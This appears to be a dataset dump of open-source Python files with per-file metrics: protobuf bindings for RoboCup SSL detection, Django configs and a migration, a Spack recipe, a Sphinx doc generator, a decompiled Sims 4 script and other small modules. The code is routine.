_descriptor.FieldDescriptor(
name='y', full_name='SSL_DetectionRobot.y', index=3,
number=4, type=2, cpp_type=6, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='orientation', full_name='SSL_DetectionRobot.orientation', index=4,
number=5, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='pixel_x', full_name='SSL_DetectionRobot.pixel_x', index=5,
number=6, type=2, cpp_type=6, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='pixel_y', full_name='SSL_DetectionRobot.pixel_y', index=6,
number=7, type=2, cpp_type=6, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='height', full_name='SSL_DetectionRobot.height', index=7,
number=8, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=163,
serialized_end=314,
)
_SSL_DETECTIONFRAME = _descriptor.Descriptor(
name='SSL_DetectionFrame',
full_name='SSL_DetectionFrame',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='frame_number', full_name='SSL_DetectionFrame.frame_number', index=0,
number=1, type=13, cpp_type=3, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='t_capture', full_name='SSL_DetectionFrame.t_capture', index=1,
number=2, type=1, cpp_type=5, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='t_sent', full_name='SSL_DetectionFrame.t_sent', index=2,
number=3, type=1, cpp_type=5, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='camera_id', full_name='SSL_DetectionFrame.camera_id', index=3,
number=4, type=13, cpp_type=3, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='balls', full_name='SSL_DetectionFrame.balls', index=4,
number=5, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='robots_yellow', full_name='SSL_DetectionFrame.robots_yellow', index=5,
number=6, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='robots_blue', full_name='SSL_DetectionFrame.robots_blue', index=6,
number=7, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=317,
serialized_end=534,
)
_SSL_DETECTIONFRAME.fields_by_name['balls'].message_type = _SSL_DETECTIONBALL
_SSL_DETECTIONFRAME.fields_by_name['robots_yellow'].message_type = _SSL_DETECTIONROBOT
_SSL_DETECTIONFRAME.fields_by_name['robots_blue'].message_type = _SSL_DETECTIONROBOT
DESCRIPTOR.message_types_by_name['SSL_DetectionBall'] = _SSL_DETECTIONBALL
DESCRIPTOR.message_types_by_name['SSL_DetectionRobot'] = _SSL_DETECTIONROBOT
DESCRIPTOR.message_types_by_name['SSL_DetectionFrame'] = _SSL_DETECTIONFRAME
SSL_DetectionBall = _reflection.GeneratedProtocolMessageType('SSL_DetectionBall', (_message.Message,), dict(
DESCRIPTOR = _SSL_DETECTIONBALL,
__module__ = 'messages_robocup_ssl_detection_pb2'
# @@protoc_insertion_point(class_scope:SSL_DetectionBall)
))
_sym_db.RegisterMessage(SSL_DetectionBall)
SSL_DetectionRobot = _reflection.GeneratedProtocolMessageType('SSL_DetectionRobot', (_message.Message,), dict(
DESCRIPTOR = _SSL_DETECTIONROBOT,
__module__ = 'messages_robocup_ssl_detection_pb2'
# @@protoc_insertion_point(class_scope:SSL_DetectionRobot)
))
_sym_db.RegisterMessage(SSL_DetectionRobot)
SSL_DetectionFrame = _reflection.GeneratedProtocolMessageType('SSL_DetectionFrame', (_message.Message,), dict(
DESCRIPTOR = _SSL_DETECTIONFRAME,
__module__ = 'messages_robocup_ssl_detection_pb2'
# @@protoc_insertion_point(class_scope:SSL_DetectionFrame)
))
_sym_db.RegisterMessage(SSL_DetectionFrame)
# @@protoc_insertion_point(module_scope)
| 41.032028 | 1,061 | 0.737381 | 1,570 | 11,530 | 5.111465 | 0.107006 | 0.068785 | 0.034268 | 0.054829 | 0.736449 | 0.670031 | 0.650218 | 0.650218 | 0.638255 | 0.630031 | 0 | 0.046009 | 0.140416 | 11,530 | 280 | 1,062 | 41.178571 | 0.763697 | 0.032871 | 0 | 0.697211 | 1 | 0.003984 | 0.191079 | 0.145037 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.01992 | 0 | 0.01992 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
8a955ddf4eb8066df9dc120c99da7b52c9ff1b87 | 152 | py | Python | neibor/apps.py | BrendaMwiza/neighborhood | 53a4476837324f745470d7aa914214f294be21c6 | [
"MIT"
] | null | null | null | neibor/apps.py | BrendaMwiza/neighborhood | 53a4476837324f745470d7aa914214f294be21c6 | [
"MIT"
] | 3 | 2019-11-03T18:33:57.000Z | 2021-09-08T01:24:33.000Z | neibor/apps.py | BrendaMwiza/neighborhood | 53a4476837324f745470d7aa914214f294be21c6 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.apps import AppConfig
class NeiborConfig(AppConfig):
name = 'neibor'
| 16.888889 | 39 | 0.730263 | 18 | 152 | 5.888889 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007874 | 0.164474 | 152 | 8 | 40 | 19 | 0.826772 | 0.138158 | 0 | 0 | 0 | 0 | 0.046512 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
8a9e1f75933d48a36a913ef4cda57e31a8f6cc8e | 96 | py | Python | src/ttss/Mode.py | tomekzaw/ttss | 8c8fdd9e1e3544010bb3d7fe5d9b2ff59e46f61a | [
"MIT"
] | null | null | null | src/ttss/Mode.py | tomekzaw/ttss | 8c8fdd9e1e3544010bb3d7fe5d9b2ff59e46f61a | [
"MIT"
] | null | null | null | src/ttss/Mode.py | tomekzaw/ttss | 8c8fdd9e1e3544010bb3d7fe5d9b2ff59e46f61a | [
"MIT"
] | null | null | null | from enum import Enum
class Mode(Enum):
DEPARTURES = 'departure'
ARRIVALS = 'arrival'
| 13.714286 | 28 | 0.677083 | 11 | 96 | 5.909091 | 0.818182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.229167 | 96 | 6 | 29 | 16 | 0.878378 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
8aad5b2d0822def37bd3f501b9c5fe5026ac71f8 | 52 | py | Python | hillfit/__init__.py | bilalshaikh42/hillfit | 355413512af17ce123ac2b771e23fe62d878854e | [
"MIT"
] | null | null | null | hillfit/__init__.py | bilalshaikh42/hillfit | 355413512af17ce123ac2b771e23fe62d878854e | [
"MIT"
] | null | null | null | hillfit/__init__.py | bilalshaikh42/hillfit | 355413512af17ce123ac2b771e23fe62d878854e | [
"MIT"
] | null | null | null | from .fitting import HillFit
__version__ = "0.1.3"
| 13 | 28 | 0.730769 | 8 | 52 | 4.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.068182 | 0.153846 | 52 | 3 | 29 | 17.333333 | 0.704545 | 0 | 0 | 0 | 0 | 0 | 0.096154 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
8ab7adb346214653506dd8ae81e7c5a06b55d55b | 1,291 | py | Python | fragbuilder/basilisk_lib/Mocapy/MocapyExceptions.py | larsbratholm/fragbuilder | e16cbcb190403b5fef49811abd11d16d7ef7fb30 | [
"BSD-2-Clause"
] | 8 | 2015-04-11T17:43:13.000Z | 2021-12-02T10:18:45.000Z | fragbuilder/basilisk_lib/Mocapy/MocapyExceptions.py | larsbratholm/fragbuilder | e16cbcb190403b5fef49811abd11d16d7ef7fb30 | [
"BSD-2-Clause"
] | null | null | null | fragbuilder/basilisk_lib/Mocapy/MocapyExceptions.py | larsbratholm/fragbuilder | e16cbcb190403b5fef49811abd11d16d7ef7fb30 | [
"BSD-2-Clause"
] | 6 | 2015-04-01T07:18:26.000Z | 2021-04-24T11:11:18.000Z | # Mocapy: A parallelized Dynamic Bayesian Network toolkit
#
# Copyright (C) 2004 Thomas Hamelryck
#
# This library is free software: you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with BASILISK. If not, see <http://www.gnu.org/licenses/>.
"""
Mocapy exception classes.
"""
class MocapyException(Exception): pass
class MocapyVectorException(MocapyException): pass
class MocapyDBNException(MocapyException): pass
class MocapyVMFException(MocapyException): pass
class MocapyGaussianException(MocapyException): pass
class MocapyDiscreteException(MocapyException): pass
class MocapyDirichletException(MocapyException): pass
class MocapyKentException(MocapyException): pass
class MocapyEMException(MocapyException): pass
class MocapyVMException(MocapyException): pass
| 30.023256 | 70 | 0.783114 | 158 | 1,291 | 6.398734 | 0.575949 | 0.080119 | 0.189911 | 0.05638 | 0.081108 | 0.055391 | 0 | 0 | 0 | 0 | 0 | 0.004587 | 0.155693 | 1,291 | 42 | 71 | 30.738095 | 0.922936 | 0.58017 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 3 |
8aba73b8e02feea78d1362cefdd1ed6854478c36 | 1,853 | py | Python | var/spack/repos/builtin/packages/py-filelock/package.py | varioustoxins/spack | cab0e4cb240f34891a6d753f3393e512f9a99e9a | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null | var/spack/repos/builtin/packages/py-filelock/package.py | varioustoxins/spack | cab0e4cb240f34891a6d753f3393e512f9a99e9a | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 6 | 2022-01-08T08:41:11.000Z | 2022-03-14T19:28:07.000Z | var/spack/repos/builtin/packages/py-filelock/package.py | foeroyingur/spack | 5300cbbb2e569190015c72d0970d25425ea38647 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null | # Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyFilelock(PythonPackage):
"""A platform-independent file lock for Python.
This package contains a single module, which implements a platform
independent file lock in Python, which provides a simple way of
inter-process communication"""
homepage = "https://github.com/benediktschmitt/py-filelock"
pypi = "filelock/filelock-3.0.4.tar.gz"
version('3.4.0', sha256='93d512b32a23baf4cac44ffd72ccf70732aeff7b8050fcaf6d3ec406d954baf4')
version('3.0.12', sha256='18d82244ee114f543149c66a6e0c14e9c4f8a1044b5cdaadd0f82159d6a6ff59')
version('3.0.4', sha256='011327d4ed939693a5b28c0fdf2fd9bda1f68614c1d6d0643a89382ce9843a71')
version('3.0.3', sha256='7d8a86350736aa0efea0730e6a7f774195cbb1c2d61134c15f6be576399e87ff')
version('3.0.0', sha256='b3ad481724adfb2280773edd95ce501e497e88fa4489c6e41e637ab3fd9a456c')
version('2.0.13', sha256='d05079e7d7cae7576e192749d3461999ca6b0843d35b0f79f1fa956b0f6fc7d8')
version('2.0.12', sha256='eb4314a9a032707a914b037433ce866d4ed363fce8605d45f0c9d2cd6ac52f98')
version('2.0.11', sha256='e9e370efe86c30b19a2c8c36dd9fcce8e5ce294ef4ed6ac86664b666eaf852ca')
version('2.0.10', sha256='c73bf706d8a0c5722de0b745495fed9cda0e46c0eabb44eb18ee3f00520fa85f')
version('2.0.9', sha256='0f91dce339c9f25d6f2e0733a17e4f9a47b139dffda52619a0e61e013e5c6782')
version('2.0.8', sha256='7e48e4906de3c9a5d64d8f235eb3ae1050dfefa63fd65eaf318cc915c935212b')
depends_on('python@3.6:', when='@3.3:', type=('build', 'run'))
depends_on('python@2.7:2,3.5:', when='@3.1:', type=('build', 'run'))
depends_on('py-setuptools', type=('build', 'run'))
| 54.5 | 96 | 0.77496 | 179 | 1,853 | 8.005587 | 0.530726 | 0.00977 | 0.037683 | 0.033496 | 0.068388 | 0 | 0 | 0 | 0 | 0 | 0 | 0.312236 | 0.104695 | 1,853 | 33 | 97 | 56.151515 | 0.551537 | 0.212628 | 0 | 0 | 0 | 0 | 0.6363 | 0.510431 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.055556 | 0 | 0.222222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
8aba9850c786140b6211e9fd7a9163f187300909 | 199 | py | Python | yield_next.py | joshavenue/python_notebook | 8d46ba88ef4f05dea6801364bc134edb981df02e | [
"Unlicense"
] | null | null | null | yield_next.py | joshavenue/python_notebook | 8d46ba88ef4f05dea6801364bc134edb981df02e | [
"Unlicense"
] | null | null | null | yield_next.py | joshavenue/python_notebook | 8d46ba88ef4f05dea6801364bc134edb981df02e | [
"Unlicense"
] | null | null | null | def gen():
yield 3 # Like return but one by one
yield 'wow'
yield -1
yield 1.2
x = gen()
print(next(x)) # Use next() function to go one by one
print(next(x))
print(next(x))
print(next(x)) | 15.307692 | 55 | 0.628141 | 39 | 199 | 3.205128 | 0.487179 | 0.288 | 0.32 | 0.24 | 0.24 | 0.24 | 0 | 0 | 0 | 0 | 0 | 0.025806 | 0.221106 | 199 | 13 | 56 | 15.307692 | 0.780645 | 0.316583 | 0 | 0.4 | 0 | 0 | 0.022388 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0 | 0 | 0.1 | 0.4 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
8abbeaf85fe20109216100fa91b3ee91af6a398d | 2,416 | py | Python | doc/generate_autodoc_index.py | Lezval/horizon | 0e08f4f92bed0a07102c77be12969a095aac5a2a | [
"Apache-2.0"
] | 2 | 2015-05-18T13:50:20.000Z | 2015-05-18T14:47:08.000Z | doc/generate_autodoc_index.py | Lezval/horizon | 0e08f4f92bed0a07102c77be12969a095aac5a2a | [
"Apache-2.0"
] | null | null | null | doc/generate_autodoc_index.py | Lezval/horizon | 0e08f4f92bed0a07102c77be12969a095aac5a2a | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
"""Generates files for sphinx documentation using a simple Autodoc based
template.
To use, just run as a script:
$ python doc/generate_autodoc_index.py
"""
import os
base_dir = os.path.dirname(os.path.abspath(__file__))
RSTDIR = os.path.join(base_dir, "source", "sourcecode")
SRCS = {'dashboard': os.path.join(base_dir, "..", "openstack-dashboard"),
'django_openstack': os.path.join(base_dir, "..", "django-openstack")}
def find_autodoc_modules(module_name, sourcedir):
"""returns a list of modules in the SOURCE directory"""
modlist = []
os.chdir(os.path.join(sourcedir, module_name))
print "SEARCHING %s" % sourcedir
for root, dirs, files in os.walk("."):
for filename in files:
if filename.endswith(".py"):
# root = ./dashboard/test/unit
# filename = base.py
# remove the pieces of the root
elements = root.split(os.path.sep)
# replace the leading "." with the module name
elements[0] = module_name
# and get the base module name
base, extension = os.path.splitext(filename)
if not (base == "__init__"):
elements.append(base)
result = ".".join(elements)
#print result
modlist.append(result)
return modlist
if not(os.path.exists(RSTDIR)):
os.mkdir(RSTDIR)
INDEXOUT = open("%s/autoindex.rst" % RSTDIR, "w")
INDEXOUT.write("Source Code Index\n")
INDEXOUT.write("=================\n")
INDEXOUT.write(".. toctree::\n")
INDEXOUT.write(" :maxdepth: 1\n")
INDEXOUT.write("\n")
for modulename in SRCS:
for module in find_autodoc_modules(modulename, SRCS[modulename]):
generated_file = "%s/%s.rst" % (RSTDIR, module)
print "Generating %s" % generated_file
INDEXOUT.write(" %s\n" % module)
FILEOUT = open(generated_file, "w")
FILEOUT.write("The :mod:`%s` Module\n" % module)
FILEOUT.write("=============================="
"=============================="
"==============================\n")
FILEOUT.write(".. automodule:: %s\n" % module)
FILEOUT.write(" :members:\n")
FILEOUT.write(" :undoc-members:\n")
FILEOUT.write(" :show-inheritance:\n")
FILEOUT.close()
INDEXOUT.close()
| 35.014493 | 77 | 0.561258 | 275 | 2,416 | 4.84 | 0.392727 | 0.040571 | 0.030053 | 0.031555 | 0.038317 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001118 | 0.25952 | 2,416 | 68 | 78 | 35.529412 | 0.742873 | 0.076159 | 0 | 0 | 1 | 0 | 0.204478 | 0.045771 | 0 | 0 | 0 | 0.029412 | 0 | 0 | null | null | 0 | 0.022727 | null | null | 0.045455 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
76e1ac4521176e0f74fc909837b2547afdae25b0 | 4,268 | py | Python | Scripts/simulation/situations/visiting/ungreeted_player_visiting_npc_situation.py | velocist/TS4CheatsInfo | b59ea7e5f4bd01d3b3bd7603843d525a9c179867 | [
"Apache-2.0"
] | null | null | null | Scripts/simulation/situations/visiting/ungreeted_player_visiting_npc_situation.py | velocist/TS4CheatsInfo | b59ea7e5f4bd01d3b3bd7603843d525a9c179867 | [
"Apache-2.0"
] | null | null | null | Scripts/simulation/situations/visiting/ungreeted_player_visiting_npc_situation.py | velocist/TS4CheatsInfo | b59ea7e5f4bd01d3b3bd7603843d525a9c179867 | [
"Apache-2.0"
] | null | null | null | # uncompyle6 version 3.7.4
# Python bytecode 3.7 (3394)
# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]
# Embedded file name: T:\InGame\Gameplay\Scripts\Server\situations\visiting\ungreeted_player_visiting_npc_situation.py
# Compiled at: 2016-09-08 04:20:41
# Size of source mod 2**32: 5618 bytes
from sims4.tuning.instances import lock_instance_tunables
from sims4.tuning.tunable_base import GroupNames
from sims4.utils import classproperty
from situations.base_situation import _RequestUserData
from situations.bouncer.bouncer_request import SelectableSimRequestFactory
from situations.situation_complex import SituationStateData
from situations.situation_types import SituationCreationUIOption
from situations.visiting.visiting_situation_common import VisitingNPCSituation
import build_buy, distributor.ops, role.role_state, sims4.tuning.tunable, situations.bouncer.bouncer_types, situations.situation_complex
class UngreetedPlayerVisitingNPCSituation(VisitingNPCSituation):
INSTANCE_TUNABLES = {'ungreeted_player_sims': sims4.tuning.tunable.TunableTuple(situation_job=situations.situation_job.SituationJob.TunableReference(description='\n The job given to player sims in the ungreeted situation.\n '),
role_state=role.role_state.RoleState.TunableReference(description='\n The role state given to player sims in the ungreeted situation.\n '),
tuning_group=(GroupNames.ROLES))}
@classmethod
def _get_greeted_status(cls):
return situations.situation_types.GreetedStatus.WAITING_TO_BE_GREETED
@classmethod
def _states(cls):
return (SituationStateData(1, UngreetedPlayerVisitingNPCState),)
@classmethod
def _get_tuned_job_and_default_role_state_tuples(cls):
return [(cls.ungreeted_player_sims.situation_job, cls.ungreeted_player_sims.role_state)]
@classmethod
def default_job(cls):
return cls.ungreeted_player_sims.situation_job
@classproperty
def distribution_override(cls):
return True
def start_situation(self):
super().start_situation()
self._change_state(UngreetedPlayerVisitingNPCState())
build_buy.register_build_buy_enter_callback(self._on_build_buy_enter)
build_buy.register_build_buy_exit_callback(self._on_build_buy_exit)
def load_situation(self):
build_buy.register_build_buy_enter_callback(self._on_build_buy_enter)
build_buy.register_build_buy_exit_callback(self._on_build_buy_exit)
return super().load_situation()
def _destroy(self):
build_buy.unregister_build_buy_exit_callback(self._on_build_buy_exit)
build_buy.unregister_build_buy_enter_callback(self._on_build_buy_enter)
super()._destroy()
def _issue_requests(self):
request = SelectableSimRequestFactory(self, callback_data=_RequestUserData(role_state_type=(self.ungreeted_player_sims.role_state)),
job_type=(self.ungreeted_player_sims.situation_job),
exclusivity=(self.exclusivity))
self.manager.bouncer.submit_request(request)
def _on_sim_removed_from_situation_prematurely(self, sim, sim_job):
if self.num_of_sims > 0:
return
else:
return self.manager.is_player_greeted() or None
self._self_destruct()
def get_create_op(self, *args, **kwargs):
return distributor.ops.SetWallsUpOrDown(True)
def get_delete_op(self):
return distributor.ops.SetWallsUpOrDown(False)
def _on_build_buy_enter(self):
op = distributor.ops.SetWallsUpOrDown(False)
distributor.system.Distributor.instance().add_op(self, op)
def _on_build_buy_exit(self):
op = distributor.ops.SetWallsUpOrDown(True)
distributor.system.Distributor.instance().add_op(self, op)
lock_instance_tunables(UngreetedPlayerVisitingNPCSituation, exclusivity=(situations.bouncer.bouncer_types.BouncerExclusivityCategory.UNGREETED),
creation_ui_option=(SituationCreationUIOption.NOT_AVAILABLE),
duration=0)
class UngreetedPlayerVisitingNPCState(situations.situation_complex.SituationState):
pass | 46.901099 | 269 | 0.756795 | 507 | 4,268 | 6.04931 | 0.331361 | 0.054777 | 0.026084 | 0.03717 | 0.251386 | 0.182589 | 0.182589 | 0.182589 | 0.1239 | 0.071731 | 0 | 0.020506 | 0.165886 | 4,268 | 91 | 270 | 46.901099 | 0.841011 | 0.0806 | 0 | 0.149254 | 0 | 0 | 0.058193 | 0.00536 | 0 | 0 | 0 | 0 | 0 | 1 | 0.208955 | false | 0.014925 | 0.134328 | 0.104478 | 0.537313 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
76e3ac759cb46610e24e4c7d2702c871cceef470 | 1,129 | py | Python | server/user/migrations/0001_initial.py | MetLee/hackergame | 571b5407e0644169a2f9b3907a0a1d93138ba436 | [
"MIT"
] | 48 | 2018-09-30T11:07:52.000Z | 2021-12-07T03:32:59.000Z | server/user/migrations/0001_initial.py | MetLee/hackergame | 571b5407e0644169a2f9b3907a0a1d93138ba436 | [
"MIT"
] | 100 | 2018-10-13T18:37:25.000Z | 2021-11-11T12:14:45.000Z | server/user/migrations/0001_initial.py | MetLee/hackergame | 571b5407e0644169a2f9b3907a0a1d93138ba436 | [
"MIT"
] | 11 | 2018-10-08T14:59:33.000Z | 2022-03-02T03:21:09.000Z | # Generated by Django 2.1.12 on 2019-10-04 09:32
import random
from django.db import migrations, models
def gen_hash():
return f'{random.randrange(10000):04d}'
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('user', models.IntegerField(unique=True)),
('hash', models.TextField(default=gen_hash)),
('group', models.TextField()),
('nickname', models.TextField(null=True)),
('name', models.TextField(null=True)),
('sno', models.TextField(null=True)),
('tel', models.TextField(null=True)),
('email', models.TextField(null=True)),
('token', models.TextField()),
],
options={
'permissions': [('full', '管理个人信息')],
'default_permissions': (),
},
),
]
| 28.225 | 114 | 0.522586 | 104 | 1,129 | 5.615385 | 0.576923 | 0.205479 | 0.162671 | 0.196918 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.030223 | 0.325952 | 1,129 | 39 | 115 | 28.948718 | 0.737188 | 0.040744 | 0 | 0 | 1 | 0 | 0.109158 | 0.026827 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034483 | false | 0 | 0.068966 | 0.034483 | 0.275862 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
76eed02ced74012c47f21df319d4a40ffb5476f9 | 89 | py | Python | poke_django/trainer/apps.py | XrossFox/Poke-Django-Api-Test | 2e272b055fbeb633edb64fb2a3d6a720a50045f8 | [
"MIT"
] | 2 | 2016-10-21T21:52:08.000Z | 2021-10-19T02:19:43.000Z | poke_django/trainer/apps.py | XrossFox/Poke-Django-Api-Test | 2e272b055fbeb633edb64fb2a3d6a720a50045f8 | [
"MIT"
] | 2 | 2020-06-05T23:51:09.000Z | 2020-10-11T20:12:37.000Z | blackjack_trainer/trainer/apps.py | cberry216/blackjack-strategy-trainer | ec813a3dad9158aaf98f50dd61ab52b122c19382 | [
"MIT"
] | 4 | 2016-10-24T19:17:48.000Z | 2018-05-11T11:53:12.000Z | from django.apps import AppConfig
class TrainerConfig(AppConfig):
name = 'trainer'
| 14.833333 | 33 | 0.752809 | 10 | 89 | 6.7 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.168539 | 89 | 5 | 34 | 17.8 | 0.905405 | 0 | 0 | 0 | 0 | 0 | 0.078652 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
76f27d8974c6c64d388588d2537e66e0ab436004 | 1,438 | py | Python | plynx/base/resource.py | khaxis/plynx | 20768470261fc5f29cb660c815c479b49765b2fe | [
"Apache-2.0"
] | 137 | 2018-11-14T07:13:33.000Z | 2020-02-03T12:32:35.000Z | plynx/base/resource.py | khaxis/plynx | 20768470261fc5f29cb660c815c479b49765b2fe | [
"Apache-2.0"
] | 10 | 2019-01-11T21:51:14.000Z | 2020-01-30T01:29:22.000Z | plynx/base/resource.py | khaxis/plynx | 20768470261fc5f29cb660c815c479b49765b2fe | [
"Apache-2.0"
] | 11 | 2018-11-14T15:05:54.000Z | 2019-09-09T15:45:49.000Z | """Templates for PLynx Resources and utils."""
from collections import namedtuple
from typing import Dict
from plynx.constants import NodeResources
